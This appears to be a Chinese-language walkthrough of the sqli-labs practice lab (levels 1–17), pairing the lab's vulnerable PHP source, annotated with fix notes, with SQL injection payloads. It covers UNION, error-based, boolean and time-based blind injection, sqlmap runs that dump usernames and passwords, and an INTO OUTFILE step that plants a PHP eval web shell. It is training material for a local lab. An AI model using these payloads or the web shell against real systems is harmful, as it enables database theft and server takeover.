
sqli-labs1

union select 1,2,table_name from information_schema.tables where table_schema = database() limit 0,1 查表名

union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='表名' limit 0,1

1.

// Less-1: the request value $id is concatenated straight into the SQL text (no
// escaping, no parameter binding). It sits inside single quotes, which is the
// context a stray ' in the input breaks out of; the remediation is a prepared
// statement with $id bound as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

'闭合

id = 1' --+

id =1' order by 4 --+ #报错 说明有三个字段

id = 1.9999' and union select 1,2,3 --+ 2,3是输出点

id=1.9999' and union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 --+查表名

id=-1' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1--+ 查字段

?id=-1' union select 1,username,password from users limit 1,1--+ 查账号密码

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dbs --batch --tables

加了 --batch 后，sqlmap 不会再交互式地询问用户，所有选项都采用默认值。

2.

// Less-2: $id is interpolated unquoted, so it is evaluated as a bare numeric
// expression and any non-numeric input is executed as SQL. A prepared statement
// (or, at minimum, an integer cast before use) is the remediation.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


id=1 and 1=1 union select 1,2, table_name from information_schema.tables where table_schema=database() limit 1,1 --+ 查表名

id=1 and 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1--+ 查字段


SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" --dbs --batch --tables



3.

// Less-3: same unescaped interpolation, here wrapped in ('...'), so both the quote
// and the parenthesis belong to the surrounding context the input has to respect.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

')闭合

id=1') and 1=1 --+

id=1.999') and 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1 --+

id=1.999') and 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1 --+

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" --dbs --batch


4.

// Less-4: $id appears inside plain parentheses here, yet the write-up closes the
// context with ") — presumably $id was wrapped in double quotes by a line this
// excerpt omits (compare the Less-10 listing). Confirm against the lab source.
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

")闭合

SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-4/?id=1" --dbs --batch


5.报错注入

// Less-5: untrusted $id is interpolated inside single quotes (string-built SQL,
// no escaping, no parameter binding).
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// Legacy ext/mysql API (deprecated in PHP 5.5, removed in 7.0); it offers no
// parameter binding at all.
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// Only a "row matched / no row" signal is rendered; no column values are echoed.
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

// The raw MySQL error message is returned to the client — an error-disclosure
// sink. Errors belong in a server-side log, with a generic message to the user.
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

id=1' --+页面正常 说明用 '闭合

id=1' and 1=1 --+ 有回显

id=1' and 1=2 --+无回显

查看代码，发现只要查询成功返回了一行数据，页面就会显示 'You are in ........'

可以考虑使用报错注入或者布尔盲注

报错注入使用updatexml

id=1' and updatexml(1,concat(0x7e,(select concat_ws(':',database(),version(),user()))),1)--+==> XPATH syntax error: '~security:5.7.26:root@localhost'得到数据库等信息

id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1)--+得到表名==> XPATH syntax error: '~emails,referers,uagents,users~'

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+得到字段名==>XPATH syntax error: '~id,username,password~'

id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+查账号密码


SQLmap

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" #判断是否存在注入

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" --dbs #获取数据库信息

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security --tables #获取表名

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security -T users --columns#获取字段名

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" -D security -T users -C username,password --dump #获取账号密码



6.报错注入

// Less-6: $id is interpolated unquoted here; the write-up closes the context with ",
// so the value is presumably wrapped in double quotes by a line omitted from this
// excerpt (compare the Less-10 listing). Confirm against the lab source.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// Legacy ext/mysql API (deprecated in PHP 5.5, removed in 7.0); no parameter binding.
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// Success branch reveals only that a row matched; no data columns are echoed.
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

// Failure branch returns the raw MySQL error text to the client — an
// error-disclosure sink. Log it server-side and show a generic message instead.
echo '<font size="3" color= "#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}
}
else { echo "Please input the ID as parameter with numeric value";}

使用"闭合

显错注入

id=1" --+

id=1" and 1=1 --+

id=1" and 1=2 --+

id=1" and updatexml(1,(concat(0x7e,(select database()),0x7e)),1) --+ 查数据库名 ==>XPATH syntax error: '~security~'

id=1" and updatexml(1,(concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)),1) --+ 查表名

id=1" and updatexml(1,(concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e)),1) --+ 查字段


7.文件写入

// Less-7: $id is interpolated inside (('...')) without escaping or binding.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// The success text itself hints at SELECT ... INTO OUTFILE. That path only works
// when the DB account holds the FILE privilege and secure_file_priv permits the
// target directory — keep the former ungranted to the web application's account and
// the latter restricted (or NULL) anywhere that is not a lab box.
if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// A fixed string is shown and mysql_error() is commented out, so unlike Less-5/6
// no real error text is disclosed in this level.
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}

根据提示要我们写入文件

写入一句话的条件

数据库账号具有向服务器文件系统写文件的权限（MySQL 的 FILE 权限）

知道网站的绝对路径


在做写入练习时,需要用到into outfile ,但执行后却无法生成写入文件

解决方案

在MYSQL命令行输入 show variables like '%secure%';查看secure-file-priv的值

发现secure_file_priv值为NULL

在 my.ini 中修改或添加 secure_file_priv="/"，然后保存并重启数据库。（secure_file_priv 为 NULL 时 MySQL 禁止一切文件导入/导出；把它改成 "/" 等于去掉这层限制，只应在本地靶机环境这样做。）

运行http://127.0.0.1/sqli-labs/Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%22D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\shell.txt%22%20--+成功生产写入文件


根据代码进行闭合id=1')) --+

id=1')) and (select count(*) from mysql.user)>0--+ 不报错说明当前数据库账号能读取 mysql.user，即拥有较高权限（通常是 root）

通过前面的关卡得到绝对路径

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+==>

Your Login name:D:\phpstudy_pro\Extensions\MySQL5.7.26\
Your Password:D:\phpstudy_pro\Extensions\MySQL5.7.26\data\


?id=-1')) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile "D:\phpstudy_pro\WWW\sqli-labs"--+

?id=-1')) union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\shell.php"--+

使用菜刀连接


8.布尔盲注


// Less-8: $id is interpolated inside single quotes, unescaped and unbound.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// The response carries exactly one bit: the "You are in" text when a row matched,
// nothing when it did not. Every error/diagnostic echo in the else branch is
// commented out, so no error text leaks — but the injection itself is unchanged;
// the fix is a bound parameter, not a quieter response.
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

与第五关相比,把部分代码进行了注释,无法使用报错注入,可以考虑布尔盲注或者时间盲注.

?id=1' and 1=1 --+ 有回显 ’you are in’

?id=1' and 1=2 --+无回显

可以判断是布尔盲注

  • 判断Mysql数据库是否是在5.0以上

?id=1' and mid(version(),1,1)=5 --+有回显 或

?id=1' and left(version(),1)='5' --+有回显

?id=1' and left(version(),6)='5.7.26' --+ 有回显判断出数据库版本为5.7.26

  • 判断当前数据库长度

?id=1' and length(database())>7 --+

?id=1' and length(database())=8 --+

  • 截取数据库第一位ascii并判断值

?id=1' and (ord(mid(database(),1,1)))>114 --+

?id=1' and (ord(mid(database(),1,1)))=115 --+

或者

?id=1' and left(database(),1)>'n' --+

?id=1' and left(database(),1)='s' --+

?id=1' and left(database(),2)='se' --+

?id=1' and left(database(),3)='sec' --+

依次得到后面7位 ==>数据库名为security

http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid(database(),1,1)))=
115 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid((select
database()) ,2,1))) = 101 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ord(mid((select
database()) ,3,1))) = 99 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select
database()) ,4,1))) = 117 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+
http://127.0.0.1/sql-labs/less-8/?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+


获取数据库第一张表的长度(注:这里length()里面要再加一个括号 )

id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 --+

id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

也可以这样写

?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+ 最终得到长度为6

?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit X,1)>5 --+ 判断第X张表的长度


  • 判断表的第N个字符 截取第N位的ASCII码进行判断,利用ord()mid(***,1,1)或者substr(***,1,1)

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+判断security库中的第一个表的第一个ascii值为101 即e

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+ 第二位位m ==>最终得到第一张表名为emails

第X张表的第N位ASCII码值判断

?id=1' and ord(mid((select table_name from information_schema.tables where table_schema='security' limit X-1,1),N,1))=101 --+

也可以利用regexp注入获取users表中的列

http://127.0.0.1/sql/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+


使用SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 --dbs --technique B --batch

参数:--technique

这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection（布尔盲注）
E: Error-based SQL injection（报错注入）
U: UNION query SQL injection（联合查询注入）
S: Stacked queries SQL injection（堆叠/多语句查询注入）
T: Time-based blind SQL injection（基于时间延迟的盲注）


9.时间盲注


// Less-9: the same unescaped interpolation of $id inside single quotes.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// Both branches render the identical "You are in" text and all error output is
// commented out, so the response body carries no signal at all; only response
// timing remains observable. Hiding output does not remove the injection — a
// prepared statement with $id bound is still the fix.
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

无论语句是否执行成功,都会返回同样的回显,所以需要通过时间盲注猜解数据

?id=1' and sleep(3) --+尝试'```"等闭合方式,根据sleep确认是否闭合

?id=1' and if(mid(version(),1,1)=5,sleep(5),1) --+判断数据库版本

?id=1' and if(length(database()=8),sleep(5),1) --+判断数据库长度

?id=1' and if(ascii(mid(database(),1,1))=115,sleep(5),1) --+ 判断数据库名

?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>3,sleep(5),1) --+判断表长度(length()里面的需要加())

使用SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-9/?id=1 --dbs --technique T --batch


10.时间盲注

// Less-10: the value is first wrapped in double quotes, then interpolated. The
// wrapping is plain string concatenation, not escaping, so a " inside $id still
// terminates the literal and the remainder runs as SQL.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// As in Less-9, success and failure print the same text and error output is
// commented out, so the response content gives no signal.
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

和第九关一样,不过是双引号闭合

?id=1" and sleep(5)--+


11.POST注入

 // Less-11: both POST fields are concatenated into the query unescaped; the leading @
 // silences any PHP notice raised while building the string. The submitted password
 // is compared directly against the password column, which implies plaintext storage —
 // confirm against the schema (hash with password_hash()/password_verify() if so).
 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
// Legacy ext/mysql API (deprecated in PHP 5.5, removed in 7.0); no parameter binding.
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
......

uname=admin' and 1=1 -- & passwd=admin或者uname=admin' and 1=1 # & passwd=admin --+会报错

uname=admin' order by 2 -- & passwd=admin判断字段数

uname=-1' and 1=1 union select 1,2 -- & passwd=admin 找回显点

uname=-1' and 1=1 union select @@datadir,version() -- & passwd=admin查看数据库版本


SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

12 POST注入

// Less-12: same unescaped concatenation as Less-11, with each field inside plain
// parentheses. The write-up closes the context with ") so the values are presumably
// double-quoted by a line this excerpt omits — confirm against the lab source.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

") #闭合

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-12/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs


13 POST型布尔盲注

// Less-13: both POST fields are interpolated inside ('...') without escaping or
// binding; the leading @ silences PHP notices from the string build.
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

// Success branch renders only an image; the username/password echoes are commented
// out, so no row data reaches the page.
if($row)
{
//echo '<font color= "#0000ff">';

echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';

echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
// The failure branch still returns the raw MySQL error text to the client — an
// error-disclosure sink that should be logged server-side rather than printed.
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}

没有回显,使用布尔盲注

uname=admin') and left(database(),1)>'n' # & passwd=admin

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-12/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

14POST时间盲注

"闭合 和13题一样


SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-14/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

15 POST时间/布尔盲注

uname=admin' and sleep(5) #& passwd=admin

SQLmap

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs


16POST时间盲注

uname=admin") and sleep(5) #& passwd=admin

SQLmap python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-16/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

python sqlmap.py -r 1.txt --batch --level 3 --dbs

17POST显错注入

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Disables all PHP-level error reporting for this script. This hides PHP warnings
// and notices only; it does not affect the MySQL error text that the script later
// prints explicitly via print_r(mysql_error()).
error_reporting(0);

/**
 * Normalises a single request value before it is spliced into SQL text.
 * In this level it is applied to uname only; passwd does not pass through it.
 *
 * Behaviour, in order:
 *   - a non-empty value is truncated to its first 15 characters;
 *   - if magic_quotes_gpc is on, the backslashes PHP added are removed;
 *   - a value that is not made up entirely of digits is escaped with
 *     mysql_real_escape_string() and wrapped in single quotes, so the caller
 *     must not add quotes of its own (an empty string is not all-digits and
 *     therefore becomes the quoted empty string '');
 *   - an all-digit value is converted to an integer with intval().
 *
 * Returns the quoted-and-escaped string or the integer.
 *
 * Review note: mysql_real_escape_string() and get_magic_quotes_gpc() belong to
 * APIs removed in modern PHP; escaping-then-concatenating is also weaker than a
 * prepared statement with bound parameters, which is the intended replacement.
 */
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments) — applied before escaping, so the escaped result
// can be longer than 15 characters
$value = substr($value,0,15);
}

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";


if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
] echo "</font>";
}


只对 username 使用 check_input() 函数进行过滤，passwd 未经任何处理就直接拼进了 SQL 语句。check_input() 的作用是：先截取前 15 个字符；如果开启了 GPC（magic_quotes），就去掉反斜杠；再判断值是否全部由数字组成，如果不是，就转义其中的特殊字符并加上引号，否则转为整数。

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
\x00
\n
\r
\
'
"
\x1a

uname=admin&passwd=123456' #&submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ &submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+ &submit=Submit

uname=admin&passwd=123456' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),1) --+ &submit=Submit


SQLmap

python sqlmap.py -r 1.txt --batch --dbs
